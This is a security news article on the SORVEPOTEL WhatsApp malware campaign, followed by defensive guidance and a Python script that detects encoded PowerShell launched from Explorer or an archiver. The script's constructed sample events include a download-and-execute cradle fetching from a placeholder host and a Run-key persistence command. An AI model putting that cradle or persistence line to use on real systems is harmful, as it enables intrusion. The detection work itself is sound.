
Fast-Spreading Malware SORVEPOTEL Targets WhatsApp Users via Phishing Campaigns
In September 2025 a new malware campaign targeting WhatsApp users was detected. The malware, tracked as SORVEPOTEL, is self-propagating: it spreads through phishing messages that carry malicious ZIP archives disguised as receipts or budgets. The archive contains a hidden Windows shortcut (.lnk); when the user runs it, the shortcut launches an encoded PowerShell command that downloads further payloads, establishes persistence and connects to attacker-controlled servers. The malware then hijacks the active WhatsApp session on the compromised machine and sends copies of itself to every contact and group, so each victim becomes the next sender. Because the lure arrives from a contact the recipient already trusts, the campaign propagates far faster than ordinary spam.

The campaign is a reminder that phishing remains effective and that built-in, signed tooling such as PowerShell is routinely abused for malicious ends. Neither the encoded command line nor the hidden shortcut is novel, but together they defeat casual inspection: the user sees a document-like file, and a naive filter sees a base64 string rather than a download cradle.

Organizations should filter archives at the email and messaging boundary and treat ZIP files that contain shortcut files or scripts as suspicious, quarantining them rather than delivering them. On the endpoint, PowerShell script block logging (event 4104 in the PowerShell Operational log) records encoded commands in decoded form, which makes them visible to detection rules; alerting on powershell.exe launched from explorer.exe or an archiver with an -EncodedCommand argument and a hidden window catches this launch pattern directly. Endpoint protection should inspect PowerShell content at execution time (for example through AMSI), and PowerShell should be constrained where it is not needed.

Users should be told that an unexpected attachment from a known contact is exactly what a hijacked account produces: a "receipt" that unpacks to a shortcut should be reported, not opened. Finally, because the malware spreads through the victim's own WhatsApp contacts and groups, the incident response plan must cover more than the host: isolate the machine, log out the linked WhatsApp sessions, and warn the contacts and groups that received the lure so the chain is broken before the next hop.
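As an added illustration (not code from the original report and not derived from SORVEPOTEL samples), the following Python script shows the detection logic a SOC analyst would run over process-creation telemetry for the launch pattern described above: powershell.exe started with an -EncodedCommand argument, the argument decoded from base64 over UTF-16LE, and the decoded script checked for download, execution and persistence indicators. The sample events, the example.invalid URL and the set of archiver parent process names are constructed assumptions for the example, not indicators of this campaign.

```python
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match every prefix, longest first. Only the '-' switch form is handled here.
_ENC_FLAG = "|".join(re.escape("encodedcommand"[:n]) for n in range(14, 0, -1))
_ENC_RE = re.compile(
    r"(?:^|\s)-(?:" + _ENC_FLAG + r")\s+[\"']?([A-Za-z0-9+/=]{16,})", re.I
)

# Assumed parents from which a double-clicked shortcut inside a ZIP would launch
# (Explorer's built-in zip folder or a third-party archiver). Tune per environment.
ARCHIVE_PARENTS = {"explorer.exe", "7zfm.exe", "winrar.exe"}

# Indicators mapped to the behaviour described in the article. Checked against the
# decoded script plus the raw command line (the hidden-window switch lives there).
INDICATORS = {
    "download": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer",
        re.I,
    ),
    "execute_downloaded": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "persistence": re.compile(
        r"CurrentVersion\\Run|schtasks|New-ScheduledTask|Start Menu\\Programs\\Startup", re.I
    ),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}


def extract_encoded_command(command_line):
    """Return the base64 blob passed to -EncodedCommand, or None if absent."""
    m = _ENC_RE.search(command_line)
    return m.group(1) if m else None


def decode_encoded_command(b64):
    """-EncodedCommand is base64 over the UTF-16LE bytes of the script; None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def find_indicators(text):
    """Names of the indicator classes present in text, sorted for stable comparison."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def analyze_event(event):
    """Classify one process-creation record (dict with image, parent_image, command_line)."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    result = {
        "encoded": False,
        "decoded": None,
        "indicators": [],
        "parent_is_archive_browser": parent in ARCHIVE_PARENTS,
        "suspicious": False,
    }
    if image not in ("powershell.exe", "pwsh.exe"):
        return result
    b64 = extract_encoded_command(event["command_line"])
    if b64 is None:
        return result
    result["encoded"] = True
    result["decoded"] = decode_encoded_command(b64)
    result["indicators"] = find_indicators((result["decoded"] or "") + "\n" + event["command_line"])
    # Encoded PowerShell spawned by a shell/archiver is the lure's launch pattern on its own;
    # indicators in the decoded script raise the verdict for any parent.
    result["suspicious"] = result["parent_is_archive_browser"] or bool(result["indicators"])
    return result


def encode_for_powershell(script):
    """Helper used only to build the constructed samples below (what -EncodedCommand expects)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records, not real telemetry from this campaign.
_LURE_SCRIPT = (
    r"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2'); "
    r"Set-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name Updater -Value 'C:\Users\Public\u.exe'"
)
SAMPLE_EVENTS = [
    {   # shortcut double-clicked in Explorer: hidden window, encoded download-and-persist script
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "powershell.exe -nop -w hidden -enc " + encode_for_powershell(_LURE_SCRIPT),
    },
    {   # benign encoded command from a service-launched admin task
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "command_line": "powershell.exe -EncodedCommand "
        + encode_for_powershell("Get-Service | Where-Object Status -eq 'Running'"),
    },
    {   # unrelated process, ignored
        "image": r"C:\Windows\System32\notepad.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "notepad.exe receipt.txt",
    },
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(analyze_event(ev))
```

The parent-process test is what separates the lure from legitimate automation: a scheduled task or management agent that runs encoded PowerShell is common, but a user-facing shell or archiver spawning it with a hidden window is not. Feeding real Sysmon Event 1 or Windows 4688 records only requires mapping their Image, ParentImage and CommandLine fields onto the event dict.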